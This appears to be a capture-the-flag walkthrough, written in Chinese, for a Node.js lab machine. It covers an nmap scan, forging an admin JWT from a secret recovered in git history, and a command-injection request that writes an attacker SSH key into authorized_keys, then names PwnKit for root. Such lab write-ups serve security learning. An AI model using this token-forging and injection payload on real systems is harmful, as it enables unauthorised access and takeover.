- gin·Last edited by gin on Mar 17, 2022Linked with GitHubContributed by
Log in to edit or delete your comments and be notified of replies.
There is no commentSelect some text and then click Comment, or simply add a comment to this page from below to start a discussion.
Overall
Used Skill
- node.js
- git leak
- jwt
Rating
- ⭐⭐☆☆☆☆☆☆☆☆
Recon
nmap
~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.120
Nmap scan report for 10.10.11.120
Host is up (0.40s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
| 256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_ 256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open http Node.js (Express middleware)
|_http-title: DUMB Docs
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/17%OT=22%CT=1%CU=44381%PV=Y%DS=2%DC=T%G=Y%TM=62332FE
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 397.90 ms 10.10.14.1
2 397.73 ms 10.10.11.120
Stats: 0:01:12 elapsed; 1 hosts completed (1 up), 0 undergoing Script Post-Scan
NSE Timing: About 0.00% done
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.82 seconds
Get Shell
- 80 port 是 Web 頁面,可以下載 source code,該服務架在 3000 port
- 有個 /api/priv API 需要 theadmin 帳號,用
auth-tokenheader 傳送 jwt token,該 token 用環境變數TOKEN_SECRET作為 jwt key - 翻看 git log 可以找到被移除的
TOKEN_SECRET,移除後並未修改,使用該 key 得到 theadmin jwt> const TOKEN_SECRET='gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE' undefined > const jwt = require('jsonwebtoken') undefined > jwt.sign({ _id: '123', name: 'theadmin' , email:'aa'}, TOKEN_SECRET ) 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiIxMjMiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6ImFhIiwiaWF0IjoxNjQ3NTIyOTM1fQ.mAAgzJjzJ8eSdMNTjzh4RwfYS4TUFmS3uCMwxjuGObA' - /api/logs 端點有 command injection,直接拼接,透過該端點寫 ssh key 到
~/.ssh/authorized_keys
GET /api/logs?file=index.js%3becho%20'ssh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABgQDuXAKp6lilCgdGpsrip1Zx8Ex%2bwC8Y9OlElgzsCs2gyh2RleVA26cwq2uLwF%2bO4lVtLunxGbvcN97gCVKb%2bEstkjSRmMkhCrmb7hRO3mvvul770f2333iMcd4xtQCTBXbYjdFdR7IQAp8p9iSrYUeyU%2fLnKMFeboKRY4kFhIuSvavy5mflJalTKq%2bBhGZd3DCKHk%2bcbH4FLcoMy9hTy3Js%2bzaw28Td%2bLo4oTm2LP%2fW2w%2fwopgCy5FWv531udIYT8AQxX47IOSloRqOeRfyX3SV9jdXVv0AutPq1REykxW14Clv2xbR%2fddQfcCmbMBSp8lXpR%2btkhDNdk82rawaX7HJMmJAY%2bg%2fQEgoEePOEfppawCsFwdzTdAoTCU2kfl6CNx3rB%2bF9CAP8Twgom5Mt%2flYPi2N%2fZEhRo2OCK9Sx5PZx79UAHnO0WeQc5BWeUYJrBacBuvnaFCejcJHFP5LNti5xMI1FvmNMwlFO7%2bPsmIZnZfSxbhg9FP%2fy1ixD3eoymk%3d%20eethan1%40Magdalene2'%20%3e%20%2fhome%2fdasith%2f.ssh%2fauthorized_keys HTTP/1.1
auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiIxMjMiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6ImFhIiwiaWF0IjoxNjQ3NTIyOTM1fQ.mAAgzJjzJ8eSdMNTjzh4RwfYS4TUFmS3uCMwxjuGObA
Host: 10.10.11.120:3000
- 最後 ssh get shell
ssh -i ~/tmp/id_rsa dasith@10.10.11.120
Privilege Escalation
- 執行
linpeas.sh顯示使用 Sudo version 1.8.31 有 CVE-2021-3156 ,試了一下 https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit 沒成功,README 上有特別標註用 sudoedit 判別是不是可以 exploit,試了後是不行 exploit - 最後使用 PwnKit 拿到 root
Image Not Showing Possible Reasons- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
gin
·
Read more
XSS 筆記
:::spoiler TOC ::: Spec & source code refhttps://blog.huli.tw/2022/04/24/script-type/ sourcegraph: search source code chromium source code
Feb 5, 2025HTML
:::spoiler TOC ::: 工具 jsbin: 快速測試 HTML Living Standar - 8 Web application APIs multipage 和 one-page 內容有出入
Feb 5, 2025php
:::spoiler TOC ::: :::spoiler 待整理 [ ] http://www.madchat.fr/coding/php/secu/ ::: PHP
Jan 15, 2025SQLI 筆記
SQL Injection :::spoiler 目錄 ::: PayloadsAllTheThings/SQL Injection sqlmap usage mssqlserver
Aug 26, 2024Published on 
HackMD
HackMD